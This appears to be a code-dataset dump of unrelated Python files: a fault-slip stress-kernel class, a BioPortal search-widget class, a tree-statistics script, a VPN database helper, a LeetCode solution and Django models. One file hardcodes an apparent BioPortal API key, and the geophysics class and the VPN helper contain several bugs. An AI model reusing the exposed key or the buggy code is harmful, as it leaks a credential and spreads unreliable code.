{shear shear, dip shear, normal stress} and d={strike slip, dip slip}.\n KK = {}\n KK['ss'] = KK['sd'] = KK['sn'] = []\n KK['ds'] = KK['dd'] = KK['dn'] = []\n\n # stress on shear zone due to fault slip\n # KL[i,j] is stress s[j] due to slip d[i], where d={strike slip, dip slip}.\n KL = {}\n KL['s11'] = KL['s12'] = KL['s13'] = KL['s22'] = KL['s23'] = KL['s33'] = []\n KL['d11'] = KL['d12'] = KL['d13'] = KL['d22'] = KL['d23'] = KL['d33'] = []\n\n # traction on fault due to shear zone\n # LK[i,j] is traction s[j] due to strain e[i], where\n # e=[e11,e12,e13,22,e23,e33] and s={strike shear, dip shear, normal shear]\n LK = {}\n LK['s11'] = LK['d11'] = LK['n11'] = []\n LK['s12'] = LK['d12'] = LK['n12'] = []\n LK['s13'] = LK['d13'] = LK['n13'] = []\n LK['s22'] = LK['d22'] = LK['n22'] = []\n LK['s23'] = LK['d23'] = LK['n23'] = []\n LK['s33'] = LK['d33'] = LK['n33'] = []\n\n # shear zones self stress\n # LL[i,j] is stress s[j] due to e[i] where s=[s11,s12,s13,s22,s23,s33]\n # and e=[e11,e12,e13,22,e23,e33]\n LL = {}\n LL['1111'] = LL['1211'] = LL['1311'] = LL['2211'] = LL['2311'] = LL['3311'] = []\n LL['1112'] = LL['1212'] = LL['1312'] = LL['2212'] = LL['2312'] = LL['3312'] = []\n LL['1113'] = LL['1213'] = LL['1213'] = LL['2213'] = LL['2313'] = LL['3313'] = []\n LL['1122'] = LL['1222'] = LL['1322'] = LL['2222'] = LL['2322'] = LL['3322'] = []\n LL['1123'] = LL['1223'] = LL['1323'] = LL['2223'] = LL['2323'] = LL['3323'] = []\n LL['1133'] = LL['1233'] = LL['1333'] = LL['2233'] = LL['2333'] = LL['3333'] = []\n\n # fault stress due to continuous source\n # FK[i,j] is traction s[j] due to fault slip d[i], where\n # s = {shear shear, dip shear, normal stress} and d={strike slip, dip slip}.\n FK = {}\n FK['ss'] = FK['sd'] = FK['sn'] = []\n FK['ds'] = FK['dd'] = FK['dn'] = []\n\n # stress on shear zone due to continuous fault slip\n # FL[i,j] is stress s[j] due to slip d[i], where d={strike slip, dip slip}.\n FL = {}\n FL['s11'] = FL['s12'] = FL['s13'] = FL['s22'] = FL['s23'] = FL['s33'] = []\n FL['d11'] = FL['d12'] = FL['d13'] = FL['d22'] = FL['d23'] = FL['d33'] = []\n\n # coseismic events with slip distribution and stress kernels\n evt = []\n\n # source geometry and slip distribution\n src = []\n\n # fault receiver geometry\n flt = []\n\n # fault receiver geometry\n shz = []\n\n # simulation result (time and model)\n t = []\n y = []\n\n # kernel labels\n knl = []\n\n # kernel patch\n knlpath = []\n\n # constructor\n def __init__(self, src, flt, shz, evts, varargin):\n '''\n Constructor\n\n Input:\n src = instance of source\n flt = instance of recevier fault\n shz = instance of shear zone\n evts = list of cosiesmic events\n \n evl = ode.evolution(src, rcv)\n '''\n \n if isinstance(src, source) is True:\n self.src.N = 0\n self.src.dgf = 0\n if isinstance(shz, receiver) is True:\n self.shz.N = 0\n self.shz.dgf = 0\n if isinstance(flt, shearZoneReceiver) is True:\n self.flt.N = 0\n self.flt.dgf = 0\n \n # receiver faults\n self.flt = flt\n\n # receiver shear zones\n self.shz = shz\n\n # source faults\n self.src = src\n \n\n if len(varargin) > 0:\n self.knlpath = varargin[0]\n if os.path.exists(self.knlpath) is False:\n os.mkdir(self.knlpath)\n\n h5 = h5py.File(self.knlpath+'/greens.h5')\n # stress interactions\n if flt != None and isinstance(flt, receiver) is True:\n knl_KK = ['ss','sd','sn','ds','dd','dn']\n if len(varargin) == 0:\n self.KK = flt.tractionKernels(flt)\n else:\n if 'KK_ss' not in h5.keys():\n self.KK = flt.tractionKernels(flt)\n for i in knl_KK:\n h5.create_dataset('KK_'+i, data=self.KK[i], compression='gzip')\n else:\n for i in knl_KK:\n self.KK[i] = h5['KK_'+i][()]\n \n if len(shz) != 0:\n if flt != None or len(flt) != 0:\n knl_KL = ['s11','s12', 's13', 's22', 's23', 's33', \\\n 'd11','d12', 'd13', 'd22', 'd23', 'd33']\n if len(varargin) == 0:\n self.KL = flt.stressKernels(shz)\n for i in knl_KL:\n h5.create_dataset('KL_'+i, data=self.KL[i], compression='gzip')\n else:\n if 'KL_s11' not in h5.keys():\n self.KL = flt.stressKernels(shz)\n for i in knl_KL:\n h5.create_dataset('KL_'+i, data=self.KL[i], compression='gzip')\n else:\n for i in knl_KL:\n self.KL[i] = h5['KL_'+i][()]\n \n\n knl_LK = ['s11', 'd11', 'n11', 's12', 'd12', 'n12',\\\n 's13', 'd13', 'n13', 's22', 'd22', 'n22',\\\n 's23', 'd23', 'n23', 's33', 'd33', 'n33']\n if len(varargin) == 0:\n self.LK = shz.tractionKernels(flt)\n else:\n if 'LK_s11' not in h5.keys():\n self.LK = shz.tractionKernels(flt)\n for i in knl_LK:\n h5.create_dateset('LK_'+i, data = self.LK[i], compression='gzip')\n else:\n for i in knl_LK:\n self.LK[i] = h5['LK'+i][()]\n\n knl_LL = ['1111', '1211', '1311', '2211', '2311', '3311',\\\n '1112', '1212', '1312', '2212', '2312', '3312',\\\n '1113', '1213', '1313', '2213', '2313', '3313',\\\n '1122', '1222', '1312', '2222', '2322', '3322',\\\n '1123', '1223', '1313', '2223', '2323', '3323',\\\n '1133', '1233', '1333', '2233', '2333', '3333']\n if len(varargin) == 0:\n self.LL = shz.stressKernels(shz)\n else:\n if 'LL_1111' not in h5.keys():\n self.LL = shz.stressKernels(shz)\n for i in knl_LL:\n h5.create_dataset('LL_'+i, data=self.LL[i], compression='gzip')\n else:\n for i in knl_LL:\n self.LL[i] = h5['LL_'+i][()]\n # source/receiver stress intercations\n if len(src) != 0:\n if 1>self.src.N:\n knl_FK = ['ss', 'sd', 'sn', 'ds', 'dd', 'dn']\n knl_FL = ['s11', 's12', 's13', 's22', 's23', 's33'\\\n 'd11', 'd12', 'd13', 'd22', 'd23', 'd33']\n else:\n if flt != None or len(flt) != 0:\n knl_FK = ['ss', 'sd', 'sn', 'ds', 'dd', 'dn']\n if len(varargin) == 0:\n self.FK = src.tractionKernels(flt)\n else:\n if 'FK_ss' not in h5.keys():\n self.FK = src.tractionKernels(flt)\n for i in knl_FK:\n h5.create_dataset('FK_'+i, data=self.FK[i], compression='gzip')\n else:\n for i in self.knl.FK:\n self.FK[i] = h5['FK_'+i][()]\n if shz != None or len(shz) != 0:\n self.knl.FL = ['s11', 's12', 's13', 's22', 's23', 's33'\\\n 'd11', 'd12', 'd13', 'd22', 'd23', 'd33']\n if len(varargin) == 0:\n self.FL = src.stressKernels(shz)\n else:\n if 'FL_s11' not in h5.keys():\n self.FL = src.stressKernels(shz)\n for i in knl_FL:\n h5.create_dateset('FL_'+i, data=self.FL[i], compression='gzip')\n else:\n for i in knl_FL:\n self.FL[i] = h5['FL_'+i][()]\n self.evt = self.eventKernels(evts, flt, shz, self.knlpath)\n return\n\n def exportvtp(self, t, y, scale, jump, wdir):\n '''\n Write a series of .vtp files to disk to visualize the time series of \n fault slip in Paraview.\n\n Input:\n t = time\n y = solution vector\n scale = spatial scale factor for fault position and dimension\n jump = increment between time steps\n wdir = export dierectory\n '''\n import numpy as np\n s2y = 60*60*24*365\n y2s = 1./s2y\n xp, yp, zp, dim = self.rcv.computeVertexPosition()\n\n for k in range(len(t)):\n ss = y[0::self.dgf, k]\n ds = y[1::self.dgf, k]\n s = np.sqrt(ss**2 +ds**2)\n\n if k is 0:\n if len(t) >=2:\n vs = (y[0::self.dgf,k]-y[0::self.dgf,k+1])/(t[k+1]-t[k])*y2s\n vd = (y[1::self.dgf,k]-y[0::self.dgf,k+1])/(t[k+1]-t[k])*y2s\n else:\n vs = ss*0\n vd = ss*0\n else:\n vs = (ss-y[0::self.dgf,k-1])/(t[k]-t[k-1])*y2s\n vd = (ds-y[0::self.dgf,k-1])/(t[k]-t[k-1])*y2s\n v = np.sqrt(vs**2+vd**2)\n\n fname = \"%s/receiver-%05d.vpt\" %(wdir, 1+k/jump)\n opt = {}\n opt['strike slip'] = ss\n opt['dip slip'] = ds\n opt['slip'] = s\n opt['strike velocity'] = vs\n opt['dip velocity'] = vd\n opt['velocity'] = v\n opt['log10 velocity'] = np.log10(max(v,1e-15))\n opt['strike shear'] = y[2::self.dgf,k]\n opt['dip shear'] = y[3::self.dgf,k]\n exportvtk_rfaults(scale*xp, scale*yp, scale*zp, dim, fname)\n pass\n\n def exportflt(self, t, y, scale, wdir, varargin):\n '''\n Write a series of .flt files, one for each time step.\n\n Input:\n t = time\n y = solution vector\n scale = spatical scale factor for fault position and dimension\n wdir = export directory\n '''\n import numpy as np\n if len(varargin) > 0:\n k = varargin[0]\n ss = y[0::self.dgf,k]\n ds = y[1::self.dgf,k]\n s = np.sqrt(ss**2 + ds**2)\n rake = np.rad2deg(np.arctan2(ds, ss))\n\n fname = \"%s/receiver-%05d.flt\" %(wdir, k)\n opt = {\"time (yr)\", t[k]}\n exportflt_rfaults(s, scale*self.rcv.x[:,1],\n scale*self.rcv.x[:,0],\n -scale*self.rcv.x[:,2],\n scale*self.rcv.L,\n scale*self.rcv.W,\n self.rcv.strike, self.rcv.dip,\n rake, fname, opt)\n else:\n for k in range(len(t)):\n ss = y[0::self.dgf,k]\n ds = y[0::self.dgf,k]\n s = np.sqrt(ss**2+ds**2)\n rake = np.rad2deg(np.arctan2(ds,ss))\n opt = {\"time (yr)\", t[k]}\n exportflt_rfaults(s, scale*self.rcv.x[:,1],\n scale*self.rcv.x[:,0],\n -scale*self.rcv.x[:,2],\n scale*self.rcv.L,\n scale*self.rcv.W,\n self.rcv.strike, self.rcv.dip,\n rake, fname, opt)\n\n pass\n\n def exportxyz(self, t, y, scale, wdir):\n '''\n Write a series of .xyz files, one for each time step.\n \n Input:\n t = time\n y = solution vector\n scale = spatical scale factor for fault position and dimension\n wdir = export directory\n '''\n from geometry import Patch\n import numpy as np\n \n patch = Patch()\n xp, yp, zp, up = patch.transform4patch_general(\n self.rcv.x[:,0], self.rcv.x[:,1], -self.rcv.x[:,2],\n self.rcv.L*0, self.rcv.L, self.rcv.W, self.rcv.dip, \n self.rcv.strike)\n for k in range(len(t)):\n ss = y[0::self.dgf,k]\n ds = y[1::self.dgf,k]\n s = np.sqrt(ss**2+ds**2)\n\n fname = \"%s/receiver-%05d.xyz\" %(wdir, t)\n opt = {\"time (yr)\", t[k]}\n exportxyz_rfaults(\n s, scale*xp, scale*yp, -scale*zp,\n fname, opt)\n pass\n\n def plotHorizontalProfiles(self, depth, threshold, seismicPeriod, aseismicPeriod, component):\n pass\n\n def plotIndexProfiles(self, pos, threshold, seismicPeriod, aseismicPeriod, component, transposr):\n pass\n\n def plotVerticalProfiles(self, lo, threshold, seismicPeriod, aseismicPeriod, component):\n pass\n\n def eventstress(self, evtIndex):\n '''\n Input:\n evtIndex - the number of the event from the object's event list\n Output:\n t - a minimum size state vector containing stress components\n '''\n# import hmmvp\n from numpy import sin, cos, vstack, hstack, empty, deg2rad\n ss = self.evt[evtIndex]['src'].slip*cos(deg2rad(self.evt[evtIndex]['src'].rake))\n ds = self.evt[evtIndex]['src'].slip*sin(deg2rad(self.evt[evtIndex]['src'].rake))\n if isinstance(self.flt, receiver):\n Ks = self.evt[evtIndex]['KK']['ss'].dot(ss) + self.evt[evtIndex]['KK']['ds'].dot(ds)\n Kd = self.evt[evtIndex]['KK']['sd'].dot(ss) + self.evt[evtIndex]['KK']['dd'].dot(ds)\n Kn = self.evt[evtIndex]['KK']['sn'].dot(ss) + self.evt[evtIndex]['KK']['dn'].dot(ds)\n k = vstack((Ks, Kd, Kn)).T.flatten()\n else:\n Ks = empty(0)\n Kd = empty(0)\n Kn = empty(0)\n k = empty(0)\n \n if isinstance(self.shz, shearZoneReceiver):\n L11 = self.evt[evtIndex].KL['s11'].dot(ss) + self.evt[evtIndex].KL['d11'].dot(ds)\n L12 = self.evt[evtIndex].KL['s12'].dot(ss) + self.evt[evtIndex].KL['d12'].dot(ds)\n L13 = self.evt[evtIndex].KL['s13'].dot(ss) + self.evt[evtIndex].KL['d13'].dot(ds)\n L22 = self.evt[evtIndex].KL['s22'].dot(ss) + self.evt[evtIndex].KL['d22'].dot(ds)\n L23 = self.evt[evtIndex].KL['s23'].dot(ss) + self.evt[evtIndex].KL['d23'].dot(ds)\n L33 = self.evt[evtIndex].KL['s33'].dot(ss) + self.evt[evtIndex].KL['d33'].dot(ds)\n l = vstack((L11, L12, L13, L22, L23, L33)).T.flatten()\n else:\n L11 = empty(0)\n L12 = empty(0)\n L13 = empty(0)\n L22 = empty(0)\n L23 = empty(0)\n L33 = empty(0)\n l = empty(0)\n \n t = hstack((k, l))\n return t\n\n def migrateTo(self, c):\n '''\n Converts self to new evolution object.\n '''\n \n # fault self stress\n c.KK = self.KK\n \n # stress on shear zones due to fault slip\n c.KL = self.KL\n\n # traction on fault due to shear zones\n c.LK = self.LK\n\n # shear zones self stress\n c.LL = self.LL\n\n # fault stress dur to continuous source\n c.FK = self.FK\n\n # stres on shear zones due to continuous fault slip\n c.FL = self.FL\n\n # coseismic events with slip distribution and stress kernels\n c.evt = self.evt\n\n # source geometry and slip distribution\n c.src = self.src\n\n # fault receiver geometry\n dgf = c.flt.dgf\n c.flt = self.flt\n c.flt.dgf = dgf\n\n # fault receiver geometry\n dgf = c.shz.dgf\n c.shz = self.shz\n c.shz.dgf = dgf\n\n # simulation result (time and model)\n c.t = self.t\n c.y = self.y\n\n @staticmethod\n def eventKernels(evts, flt, shz, knlpath):\n '''\n '''\n from numpy import zeros, argsort\n \n # coseismic events with prescribed slip distribution and timing\n evt = []\n \n # order events by chronological order\n temp = zeros(len(evts))\n for k in range(len(evts)):\n temp[k] = evts[k].t0\n pos = argsort(temp)\n \n for k in range(len(evts)):\n evt.append({'src': [], 'KK': {}, 'KL': {}})\n evt[k]['src'] = evts[pos[k]]\n \n if isinstance(flt, receiver):\n evt[k]['KK']['ss'] = []\n evt[k]['KK']['sd'] = []\n evt[k]['KK']['sn'] = []\n evt[k]['KK']['ds'] = []\n evt[k]['KK']['dd'] = []\n evt[k]['KK']['dn'] = []\n if os.path.exists(knlpath) is False:\n evt[k]['KK'] = evt[k]['src'].tractionKernels(flt)\n else:\n if os.path.exists(knlpath+'/greens.h5'):\n h5 = h5py.File(knlpath+'/greens.h5')\n if 'evt_'+str(k) in h5.keys():\n evt[k]['KK']['ss'] = h5['evt_'+str(k)]['KK_ss'][()]\n evt[k]['KK']['sd'] = h5['evt_'+str(k)]['KK_sd'][()]\n evt[k]['KK']['sn'] = h5['evt_'+str(k)]['KK_sn'][()]\n evt[k]['KK']['ds'] = h5['evt_'+str(k)]['KK_ds'][()]\n evt[k]['KK']['dd'] = h5['evt_'+str(k)]['KK_dd'][()]\n evt[k]['KK']['dn'] = h5['evt_'+str(k)]['KK_dn'][()]\n else:\n evt[k]['KK'] = evt[k]['src'].tractionKernels(flt)\n grp = h5.create_group('evt_'+str(k))\n grp['KK_ss'] = evt[k]['KK']['ss']\n grp['KK_sd'] = evt[k]['KK']['sd']\n grp['KK_sn'] = evt[k]['KK']['sn']\n grp['KK_ds'] = evt[k]['KK']['ds']\n grp['KK_dd'] = evt[k]['KK']['dd']\n grp['KK_dn'] = evt[k]['KK']['dn']\n \n else:\n h5 = h5py.File(knlpath+'/greens.h5')\n evt[k]['KK'] = evt[k]['src'].tractionKernels(flt)\n grp = h5.create_group('evt_'+str(k))\n grp['KK_ss'] = evt[k]['KK']['ss']\n grp['KK_sd'] = evt[k]['KK']['sd']\n grp['KK_sn'] = evt[k]['KK']['sn']\n grp['KK_ds'] = evt[k]['KK']['ds']\n grp['KK_dd'] = evt[k]['KK']['dd']\n grp['KK_dn'] = evt[k]['KK']['dn']\n \n \n if len(shz)>0:\n evt[k]['KL']['s11'] = []\n evt[k]['KL']['s12'] = []\n evt[k]['KL']['s13'] = []\n evt[k]['KL']['s22'] = []\n evt[k]['KL']['s23'] = []\n evt[k]['KL']['s33'] = []\n evt[k]['KL']['d11'] = []\n evt[k]['KL']['d12'] = []\n evt[k]['KL']['d13'] = []\n evt[k]['KL']['d22'] = []\n evt[k]['KL']['d23'] = []\n evt[k]['KL']['d33'] = []\n \n if os.path.exists(knlpath) is False:\n evt[k]['KL'] = evt[k]['src'].stressKernels(shz)\n else:\n if os.path.exists(knlpath+'/greens.h5'):\n h5 = h5py.File(knlpath+'/greens.h5')\n if 'evt_'+str(k) in h5.keys():\n evt[k]['KL']['s11'] = h5['evt_'+str(k)]['KL_s11'][()]\n evt[k]['KL']['s12'] = h5['evt_'+str(k)]['KL_s12'][()]\n evt[k]['KL']['s13'] = h5['evt_'+str(k)]['KL_s13'][()]\n evt[k]['KL']['s22'] = h5['evt_'+str(k)]['KL_s22'][()]\n evt[k]['KL']['s23'] = h5['evt_'+str(k)]['KL_s23'][()]\n evt[k]['KL']['s33'] = h5['evt_'+str(k)]['KL_s33'][()]\n evt[k]['KL']['d11'] = h5['evt_'+str(k)]['KL_d11'][()]\n evt[k]['KL']['d12'] = h5['evt_'+str(k)]['KL_d12'][()]\n evt[k]['KL']['d13'] = h5['evt_'+str(k)]['KL_d13'][()]\n evt[k]['KL']['d22'] = h5['evt_'+str(k)]['KL_d22'][()]\n evt[k]['KL']['d23'] = h5['evt_'+str(k)]['KL_d23'][()]\n evt[k]['KL']['d33'] = h5['evt_'+str(k)]['KL_d33'][()]\n else:\n grp = h5.create_group('evt_'+str(k))\n evt[k]['KL'] = evt[k]['src'].stressKernels(shz)\n grp['KL_s11'] = evt[k]['KL']['s11']\n grp['KL_s12'] = evt[k]['KL']['s12']\n grp['KL_s13'] = evt[k]['KL']['s13']\n grp['KL_s22'] = evt[k]['KL']['s22']\n grp['KL_s23'] = evt[k]['KL']['s23']\n grp['KL_s33'] = evt[k]['KL']['s33']\n grp['KL_d11'] = evt[k]['KL']['d11']\n grp['KL_d12'] = evt[k]['KL']['d12']\n grp['KL_d13'] = evt[k]['KL']['d13']\n grp['KL_d22'] = evt[k]['KL']['d22']\n grp['KL_d23'] = evt[k]['KL']['d23']\n grp['KL_d33'] = evt[k]['KL']['d33']\n return evt\n\n def getPeriodicIndex(t, period):\n '''\n '''\n to = t[0]\n pos = []\n for k in range(len(t)):\n tc = t[k]\n if tc-to > period:\n to = tc\n if tc >= to:\n pos.append(k)\n to = tc+period\n \n return pos\n","sub_path":"ode/evolution.py","file_name":"evolution.py","file_ext":"py","file_size_in_byte":22571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"140052053","text":"\"\"\"Includes bioportalSearchWidgets class.\n\nbioportalSearchWidgets uses ipywidgets to create search boxes for the purpose\nof collecting metadata via searching the Bioportal ontology API.\n\n\"\"\"\n\nimport ipywidgets as widgets\nimport requests\nfrom IPython.display import display\nfrom metadataCollector import MetadataCollector\n\n\nclass BioportalSearchWidgets:\n \"\"\"Uses ipwidgets to create search boxes.\n\n Provides a template for a search box and a results box.\n Connects to the bioportal REST API to return ontology information.\n\n Use of this class must adhear to a strict call order as follows.\n\n 1) Initialize object to provide callback.\n 2) add_search_widget, this may be called as many times as needed to\n add the necessary metadata collecting widgets.\n 3) display_widgets, this displays the already created widgets which step\n 2 created.\n\n \"\"\"\n\n def __init__(self, submit_callback,\n bioportal_api_key='efa3babf-b23c-4399-89f7-689bb9d576fb'):\n \"\"\"Initialize variables, provide valid api key for bioportal.\n\n param: submit_callback: Callback to be executed on submit. The\n single parameter to the callback is a dictionary whose keys\n are the topics and whose values are a dictionary whose keys\n are selected keywords and whose values are bioportal responses\n for the keyword.\n\n \"\"\"\n self._widgets = []\n self._submit_callback = submit_callback\n self._apply_widget = None\n self._api_url = 'http://data.bioontology.org/'\n self._key = bioportal_api_key\n self._headers = {'Authorization': 'apikey token=' + self._key}\n \n def add_search_widget(self, topic, ontologies, required=False):\n mc = MetadataCollector(topic, ontologies, required, self.__value_changed_callback)\n self._widgets.append(mc)\n \n def GET(self, url, params=None):\n \"\"\"Convenient method for requests.get().\n\n Headers already included in call. JSON response data is returned.\n\n :param url: The website to access JSON data from.\n :param params: Parameters for the REST request.\n\n \"\"\"\n request = requests.get(url, headers=self._headers, params=params)\n return request.json()\n\n def display_widgets(self):\n self._apply_widget = widgets.Button(description='Submit',\n disabled=True)\n for widget in self._widgets:\n widget.display()\n display(self._apply_widget)\n self._apply_widget.on_click(self.__on_apply_clicked)\n\n def __value_changed_callback(self):\n for widget in self._widgets:\n if widget.is_required():\n if not widget.has_results():\n self._apply_widget.disabled = True\n return\n self._apply_widget.disabled = False\n\n def __on_apply_clicked(self, change):\n final_results = dict()\n for widget in self._widgets:\n if widget.has_results():\n results = widget.get_results()\n topic = widget.get_topic()\n final_results[topic] = results\n self._submit_callback(final_results)\n\n\n","sub_path":"pymitools/ontologies/bioportalSearchWidgets.py","file_name":"bioportalSearchWidgets.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"475272071","text":"import sqlalchemy as db\nfrom sqlalchemy.orm import sessionmaker\nimport re\nimport statistics\n\nDATABASE = '/home/train59/AITP2020-DS-Challenge/data/TREE.db'\n\nengine = db.create_engine('sqlite:////home/train59/AITP2020-DS-Challenge/data/TREE.db')\nconnection = engine.connect()\nmetadata = db.MetaData()\n\nplot = db.Table('PLOT', metadata, autoload=True, autoload_with=engine)\nspecies = db.Table('SPECIES', metadata, autoload=True, autoload_with=engine)\ntree = db.Table('TREE', metadata, autoload=True, autoload_with=engine)\n\n\nquery = db.select([species])\nResultProxy = connection.execute(query)\nresults = ResultProxy.fetchall()\n\nspecies_list = []\nfor result in results:\n if result.SPCD not in species_list:\n species_list.append(result.SPCD)\n\n# print(species_list)\n\nfile_path = '/home/train59/AITP2020-DS-Challenge/outputs/'\n\nfh = open(f'/home/train59/AITP2020-DS-Challenge/outputs/hieght.csv', 'w')\nfd = open(f'/home/train59/AITP2020-DS-Challenge/outputs/diameter.csv', 'w')\n\nre_pattern = r'(.*):(.*):(.*):(.*):(.*):(.*):(.*):(.*)'\n\n# spcd = 896\nfor spcd in species_list:\n data_list = []\n try:\n with open(f'/home/train59/AITP2020-DS-Challenge/data/{spcd}.txt') as fd: \n lines = fd.readlines()\n for line in lines:\n results = re.findall(re_pattern, line.strip())\n data = {\n 'INVYR': results[0][0],\n 'STATECD': results[0][1],\n 'PLOT': results[0][2],\n 'HT': results[0][3],\n 'ACTUALHT': results[0][4],\n 'STATUSCD': results[0][5],\n 'DIA': results[0][6],\n 'HTCD': results[0][7],\n \n }\n data_list.append(data)\n\n hieght_list = []\n dia_list = []\n max_hieght = 0\n max_dia = 0\n max_hieght_year = 0\n max_dia_year = 0\n for data in data_list:\n if int(data['STATUSCD']) == 1:\n try:\n hieght_list.append(float(data['HT']))\n except:\n pass\n try:\n dia_list.append(float(data['DIA']))\n except:\n pass\n if float(data['HT']) > max_hieght:\n max_hieght = float(data['HT'])\n max_hieght_year = data['INVYR']\n\n if float(data['DIA']) > max_dia:\n max_dia = float(data['DIA'])\n max_dia_year = data['INVYR']\n\n # print(hieght_list)\n # print(statistics.mean(hieght_list))\n\n # print(max_hieght)\n # print(max_hieght_year)\n\n\n # for result in results: \n fh.write(f'{spcd},{max_hieght_year},{round(max_hieght, 2)},{round(statistics.mean(hieght_list), 2)},{round(statistics.stdev(hieght_list), 2)},{round(statistics.median(hieght_list), 2)}\\n')\n fd.write(f'{spcd},{max_dia_year},{round(max_dia, 2)},{round(statistics.mean(dia_list), 2)},{round(statistics.stdev(dia_list), 2)},{round(statistics.median(dia_list), 2)}\\n')\n except:\n pass\n\nfh.close()\nfd.close()","sub_path":"code/find_max.py","file_name":"find_max.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"488547305","text":"#!/usr/bin/python3\nimport mysql.connector as ms\nimport ipaddress as ipa\nimport socket, struct\nimport sys,os\nimport ipaddress\npath = os.path.abspath(os.path.realpath(__file__)+\"/../..\")\nsys.path.append(path)\nsys.path.append(\"/etc/networkmanagement\")\nimport server_config\nimport helpers\n\nif len(sys.argv) != 2:\n print(\"usage: \"+sys.argv[0]+\" \")\n exit(1)\nidentifier = sys.argv[1]\n\ndevice = helpers.Device(identifier)\nnew_hostname = device.hostname+\".\"+device.context.name\ncur.execute(\"SELECT INET_ATON(ip) from devices WHERE context = 'vpn' ORDER BY INET_ATON(ip) DESC Limit 1\")\nnew_ip = str(ipaddress.ip_address(cur.fetchone()[0]+1))\n\nsql = \"INSERT INTO devices (identifier,ip,context,hostname,description,connection) VALUES ('%s','%s','vpn','%s','%s','openvpn')\"\nprint(sql%(device.fqdn,new_ip,new_hostname,device.description))\ntry:\n cur.execute(sql,(device.fqdn,new_ip,new_hostname,device.description))\n db.commit()\nexcept:\n db.rollback()\n","sub_path":"helpers/createopenvpnentry.py","file_name":"createopenvpnentry.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"368737330","text":"\"\"\"\n7. Reverse Integer\nEasy\nGiven a signed 32-bit integer x, return x with its digits reversed. If reversing x causes the \nvalue to go outside the signed 32-bit integer range [-231, 231 - 1], then return 0.\nAssume the environment does not allow you to store 64-bit integers (signed or unsigned).\n\nExample 1:\nInput: x = 123\nOutput: 321\n\nExample 2:\nInput: x = -123\nOutput: -321\n\nExample 3:\nInput: x = 120\nOutput: 21\n\nExample 4:\nInput: x = 0\nOutput: 0\n\nConstraints:\n-231 <= x <= 231 - 1\n\"\"\"\n\nclass Solution:\n def reverse(self, x: int) -> int:\n if -9 < x < 9: # input single digit? return as is\n return x\n \n MIN_INT, MAX_INT = -2 ** 31, (2 ** 31) - 1 \n \n is_negative = True if x < 0 else False\n if is_negative:\n x *= -1\n \n reverse = 0\n while x:\n reverse = reverse * 10 + x % 10\n x //= 10\n \n if is_negative:\n reverse *= -1\n \n if MIN_INT <= reverse <= MAX_INT:\n return reverse\n return 0\n","sub_path":"7_Reverse_Integer.py","file_name":"7_Reverse_Integer.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"74826976","text":"import math\nv = int(input('Qual a velocidade? '))\nteta = int(input('Qual o angulo? '))\nradiano = math.radians(teta)\ng = 9.8\n\nd = (v**2*math.sin(2*radiano))/g\n \nd_espalhada = d + math.pi*2**2\n\nif 100 - d_espalhada < 2:\n\tprint(\"Muito perto\")\nelif 100 - d_espalhada == 0:\n print(\"Acertou!\")\nelse:\n print(\"Muito longe\")\n","sub_path":"backup/user_011/ch30_2019_09_09_13_38_03_855324.py","file_name":"ch30_2019_09_09_13_38_03_855324.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"352048508","text":"from django.db import models\nfrom django.utils import timezone\n\n# Create your models here.\nclass Checklist(models.Model):\n\tid = models.AutoField(primary_key=True)\n\ttitle = models.CharField(max_length = 200,verbose_name='標題')\n\tslug = models.CharField(max_length = 200,verbose_name='編號')\t\n\tcontent = models.TextField(blank = True,verbose_name='內容')\n\tstart_date = models.DateTimeField(default = timezone.now(),verbose_name='開始日期')\n\tdue_date = models.DateTimeField(default = timezone.now(),blank = True,verbose_name='結束日期')\n\tfinish = models.BooleanField(default=False,verbose_name='結案')\n\t\n\tclass Meta:\n\t\tordering = ('-start_date',)\n\t\t\n\tdef __str__(self):\n\t\treturn self.title\n \t\t\nclass ChecklistData(models.Model):\n\tid = models.AutoField(primary_key=True)\n\tchecklistid = models.ForeignKey(Checklist,on_delete = models.CASCADE,verbose_name ='checklist')\n\tstatus = models.TextField(blank = True,verbose_name='說明')\n\tdocument = models.FileField(upload_to='documents/',blank = True)\n\tuploaded_at = models.DateTimeField(auto_now_add=True,null = True)\n\t\n\tclass Meta:\n\t\tordering = ('id',)\n\t\t\n\tdef __str__(self):\n\t\treturn self.status\n\t\n \t\nclass Personal(models.Model):\n\tid = models.AutoField(primary_key=True)\n\tjob_num = models.IntegerField(unique=True,blank=True,verbose_name='工號')\n\tname = models.CharField(max_length = 15,verbose_name='姓名')\n\tregister_date = models.DateTimeField(default = timezone.now(),verbose_name='報到日期')\n\tstep = models.IntegerField(blank=True,verbose_name='受訓日期')\n\tdeparture = models.DateTimeField(blank=True,null =True,verbose_name='離職日期' )\n\tphone = models.CharField(blank=True,max_length = 15,verbose_name='手機')\n\tbirthday = models.DateTimeField(blank=True,null =True,verbose_name='生日')\n\t\n\n\tclass Meta:\n\t\tordering = ('-job_num',)\t\n\t\n\tdef __str__(self):\n\t\treturn self.name\n\t\n\n\t\nclass Education(models.Model):\n\tid \t= models.AutoField(primary_key=True)\n\tjob_num = models.ForeignKey(Personal,on_delete=models.CASCADE,verbose_name='工號')\n\tname = models.CharField(max_length = 15,blank=True,null =True,verbose_name='姓名')\n\tsubject = models.CharField(max_length =200,verbose_name='科目')\n\t#上課日期\n\tattend_class_date = models.DateTimeField(default = timezone.now(),blank=True,null =True,verbose_name='上課日期')\t\t\n\t#測驗日期\n\texam_date = models.DateTimeField(default = timezone.now(),blank=True,null =True,verbose_name='測驗日期')\t\t\n\texam_score = models.IntegerField(blank=True,null =True,verbose_name='測驗分數')\t\t\n\t\n\tclass Meta:\n\t\tordering = ('-attend_class_date',)\t\n\t\n\tdef __str__(self):\n\t\treturn self.subject","sub_path":"mfg_site/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 